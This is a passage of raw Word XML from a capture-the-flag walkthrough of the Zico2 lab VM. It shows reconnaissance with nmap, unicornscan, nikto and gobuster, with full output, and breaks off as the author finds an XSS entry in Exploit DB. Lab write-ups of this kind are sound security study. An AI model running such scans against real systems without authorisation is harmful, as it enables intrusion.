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C7193" w14:textId="37A539E9" w:rsidR="00590797" w:rsidRDefault="00590797" w:rsidP="0059079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Zico2 Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672A809" w14:textId="77777777" w:rsidR="00590797" w:rsidRDefault="00590797" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38169290" w14:textId="46F77A0C" w:rsidR="0038192C" w:rsidRDefault="0038192C" w:rsidP="006E76C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Download VM from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F23E0" w14:textId="3E41A238" w:rsidR="0038192C" w:rsidRDefault="0038192C" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038192C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>https://www.dropbox.com/s/dhidaehguuhyv9a/zico2.ova</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F91D46" w14:textId="77777777" w:rsidR="0038192C" w:rsidRDefault="0038192C" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03483F7B" w14:textId="4320273C" w:rsidR="006E76C1" w:rsidRPr="00E71325" w:rsidRDefault="006E76C1" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Haven’t done this in a while so probably will be a bit rusty.  According to the description: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B816EC" w14:textId="77777777" w:rsidR="006E76C1" w:rsidRPr="00E71325" w:rsidRDefault="006E76C1" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="025408EC" w14:textId="23F043F9" w:rsidR="006E76C1" w:rsidRPr="00E71325" w:rsidRDefault="006E76C1" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>That being said, I’m expecting weird vulnerabilities on the system</w:t>
      </w:r>
      <w:r w:rsidR="00F11CB5" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t xml:space="preserve"> that requires manual insp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>ection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6FE25" w14:textId="77777777" w:rsidR="006E76C1" w:rsidRPr="00E71325" w:rsidRDefault="006E76C1" w:rsidP="006E76C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>, but will see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0B9C5" w14:textId="77777777" w:rsidR="0060282C" w:rsidRPr="00E71325" w:rsidRDefault="0060282C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="536C6A5E" w14:textId="6CE8BB40" w:rsidR="00F11CB5" w:rsidRPr="00E71325" w:rsidRDefault="00F11CB5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Importing the host into Vbox say it has 2 interface?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA5EA0" w14:textId="77777777" w:rsidR="004B5429" w:rsidRPr="00E71325" w:rsidRDefault="004B5429">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7390EAAB" w14:textId="7760E3D5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root@kali:~/Desktop# bash ./detailPortScan.sh </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198799B6" w14:textId="41BB456F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working on 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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02208AB3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will be a while so relax ^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575B59E" w14:textId="2F986582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--------------------------------------------------------------------------------------------------------------------------------------unicornscan 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:1-65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC537E7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TCP: 22,80,111,44631</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE9107" w14:textId="7AE1972B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--------------------------------------------------------------------------------------------------------------------------------------nmap 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 xml:space="preserve"> -A -p 22,80,111,44631</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E99FB" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B35DCE4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Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-22 15:02 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C680532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mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C4BFE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mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C40CB" w14:textId="0477AE29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Nmap scan report for </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE6669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Host is up (0.00053s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DBD2F7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PORT      STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36391B48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22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D872EC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| ssh-hostkey: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD9270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   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7B032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   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F6262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|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DF284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80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D6C2B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|_http-server-header: Apache/2.2.22 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBB2FF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|_http-title: Zico's Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EA067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111/tcp   open  rpcbind 2-4 (RPC #100000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C5900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| rpcinfo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F16B7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   program version   port/proto  service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7296C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lastRenderedPageBreak/>
        <w:t>|   100000  2,3,4        111/tcp  rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CE965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   100000  2,3,4        111/udp  rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E278A8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   100024  1          44631/tcp  status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BA6A1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|_  100024  1          49313/udp  status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13742557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44631/tcp open  status  1 (RPC #100024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C92C95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MAC Address: 08:00:27:0A:43:EF (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C02FE3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Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9F68D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Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487445F4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Running: Linux 2.6.X|3.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAC8D77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OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBD052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OS details: Linux 2.6.32 - 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05339536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Network Distance: 1 hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFEDAB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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D83AC" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3331536C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TRACEROUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A2C55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HOP RTT     ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63610A" w14:textId="6AFE54DD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1   0.53 ms </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EA443" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4059D5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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C322C3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Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56195945" w14:textId="4428313F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--------------------------------------------------------------------------------------------------------------------------------------unicornscan -mU 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:1-65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582A261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UDP: 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C35D0" w14:textId="7D610A1D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--------------------------------------------------------------------------------------------------------------------------------------nmap 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 xml:space="preserve"> -sU -A -p 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9267B" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD6262F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Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-22 15:06 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83A953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mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55039D3B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mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3D699" w14:textId="0DF6A38C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Nmap scan report for </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C7038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Host is up (0.00086s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9D681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PORT    STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96FB9E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111/udp open  rpcbind 2-4 (RPC #100000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F8D7A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| rpcinfo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57235A2F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   program version   port/proto  service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247A740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   100000  2,3,4        111/tcp  rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8047D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   100000  2,3,4        111/udp  rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00F8C5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   100024  1          44631/tcp  status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79546160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|_  100024  1          49313/udp  status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528887A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MAC Address: 08:00:27:0A:43:EF (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0879AC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Too many fingerprints match this host to give specific OS details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330B505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Network Distance: 1 hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D4C44" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2383C989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TRACEROUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D757ED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HOP RTT     ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54D9B2" w14:textId="214EF898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1   0.86 ms </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3036CB" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B2B4E7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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2F3BD" w14:textId="77777777" w:rsidR="00D5094F" w:rsidRPr="00E71325" w:rsidRDefault="00D5094F" w:rsidP="00D5094F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Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC69E7E" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABB1148" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4592B1E6" w14:textId="5C220EEA" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00454E34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My loud port scan script says port 22, 80, 111, 44631</w:t>
      </w:r>
      <w:r w:rsidR="00BA0453" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F3146" w14:textId="77777777" w:rsidR="00BA0453" w:rsidRPr="00E71325" w:rsidRDefault="00BA0453">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9DABAA" w14:textId="3C8F2B2A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root@kali:~/Desktop# nikto -h http://</w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF6676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- Nikto v2.1.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A7E34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---------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E879B8" w14:textId="1DB338DC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+ Target IP:          </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59923FD0" w14:textId="2CBF6ABF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+ Target Hostname:    </w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA702B3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Target Port:        80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F7BB2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Start Time:         2017-10-22 15:22:55 (GMT-4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D9405E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---------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678734C8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Server: Apache/2.2.22 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900C64E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Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun  8 15:18:30 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC47C85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The anti-clickjacking X-Frame-Options header is not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9E085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The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68571EDD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The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7147E83D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Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA551D6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Uncommon header 'tcn' found, with contents: list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57416B50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Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEBD8C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+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A6366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OSVDB-3268: /img/: Directory indexing found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D441B18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OSVDB-3092: /img/: This might be interesting...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D035CA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OSVDB-3233: /icons/README: Apache default file found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC90EC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Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540A865" w14:textId="77777777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+ 8328 requests: 0 error(s) and 12 item(s) reported on remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A30199" w14:textId="1C88EB6F" w:rsidR="00BA0453" w:rsidRPr="00E71325" w:rsidRDefault="00BA0453" w:rsidP="00BA0453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+ End Time:           2017-10-22 15:23:18 (GMT-4) (23 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BFADFB" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562151B5" w14:textId="25FCE78B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root@kali:~/Desktop# gobuster -u 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 xml:space="preserve"> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -x php,html,txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57486205" w14:textId="77777777" w:rsidR="00682FE7" w:rsidRPr="00E71325" w:rsidRDefault="00682FE7" w:rsidP="00682FE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE54EC8" w14:textId="77777777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Gobuster v1.2                OJ Reeves (@TheColonial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C16E4" w14:textId="77777777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=====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6E034" w14:textId="77777777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[+] Mode         : dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63E748" w14:textId="57691F62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[+] Url/Domain   : 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC9E6E" w14:textId="77777777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[+] Threads      : 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E46CF22" w14:textId="77777777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[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8517C8" w14:textId="77777777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[+] Status codes : 302,307,200,204,301</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE11A0" w14:textId="77777777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[+] Extensions   : .php,.html,.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926E2EA" w14:textId="77777777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[+] Expanded     : true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC2944" w14:textId="77777777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=====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027CBA8" w14:textId="67D8689E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/index (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC971E" w14:textId="4E1E6EE5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/index.html (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE1E63" w14:textId="59E98A5F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/img (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E07E8E" w14:textId="7423DE6E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/tools (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6401A2" w14:textId="2057CCFE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/tools.html (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F6D0F" w14:textId="7292DDD7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/view (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66279DAE" w14:textId="71FBD74F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/view.php (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9161F" w14:textId="76C3B002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/css (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B326B0B" w14:textId="6D3092D4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/js (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38415F49" w14:textId="22C01D79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/vendor (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF148A3" w14:textId="4B708B83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/package (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C7C3E" w14:textId="4EE8E27A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/LICENSE (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B726FF" w14:textId="18272B4A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/less (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FE19F" w14:textId="74FAD4E5" w:rsidR="00682FE7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/dbadmin (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F823F76" w14:textId="715F7A8F" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00682FE7" w:rsidP="00682FE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=====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C9846F" w14:textId="77777777" w:rsidR="00330878" w:rsidRPr="00E71325" w:rsidRDefault="00330878" w:rsidP="009F7588">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0921FD65" w14:textId="3C9ACB14" w:rsidR="009F7588" w:rsidRPr="00E71325" w:rsidRDefault="009F7588" w:rsidP="009F7588">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>viewing the page with a browser, I see “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.  Loofing thst up in exploit DB, found a XSS</w:t>
      </w:r>
      <w:r w:rsidR="00195272" w:rsidRPr="00E71325">
